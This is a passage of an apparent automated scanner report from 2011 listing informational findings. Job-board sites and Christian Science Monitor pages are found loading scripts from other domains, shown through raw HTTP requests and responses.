                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.308. http://www.computeraideddesigncrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.computeraideddesigncrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.computeraideddesigncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i4i09jl3sjo0digpp5qe6oqa75; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121001

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.309. http://www.constructioncrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.constructioncrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.constructioncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6c5ho2kr4aaj7if0r37e83a520; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 131637

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.310. http://www.consultingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.consultingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.consultingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cd981ht9vh5kim10q4v8a0ih67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111912

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.311. http://www.contractmanagementcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contractmanagementcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.contractmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fsi5mhj5680mc16iu88s1m9v73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111832

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.312. http://www.counselingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.counselingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.counselingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=lgk9crdg1goruniholj5urn963; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149300

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.313. http://www.cpluspluscrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cpluspluscrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.cpluspluscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:52 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=j0ddtd9qvkbq5g8p17jjmqsi44; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114789

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.314. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Length: 82676
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=3340
Expires: Fri, 21 Jan 2011 23:20:37 GMT
Date: Fri, 21 Jan 2011 22:24:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- else -->

<ti
...[SNIP]...
</script>

   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=csmtechstaff"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div id="address-46e479181328b9680cd9504cbc04d4e9-7f08a1128cc5eec7cda1269c9df3d3a6">
   <script src="http://links.mkt1259.com/ui/library/formValidate.js" language="javascript"></script>
...[SNIP]...
</script>
       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script >
...[SNIP]...

15.315. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Length: 75123
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=3361
Expires: Fri, 21 Jan 2011 23:21:02 GMT
Date: Fri, 21 Jan 2011 22:25:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- else -->

<ti
...[SNIP]...
</script>

   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=csmtechstaff"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div id="address-42b3a3dc8b20e53b7dfd5e59781b5d9d-f53ee286f2ef896a280e8ffd35a62def">
   <script src="http://links.mkt1259.com/ui/library/formValidate.js" language="javascript"></script>
...[SNIP]...
</script>
       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script >
...[SNIP]...

15.316. http://www.customerservicecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customerservicecrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.customerservicecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e126ahin8nno4266rg114hr8q7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119384

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.317. http://www.dbacrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dbacrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.dbacrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ks0hq7i64reib4jv7s3j12ces0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125721

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.318. http://www.dentalcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dentalcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.dentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:08 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=od1eunkj1a6cadocmt8bfbgt55; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:08 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:08 GMT
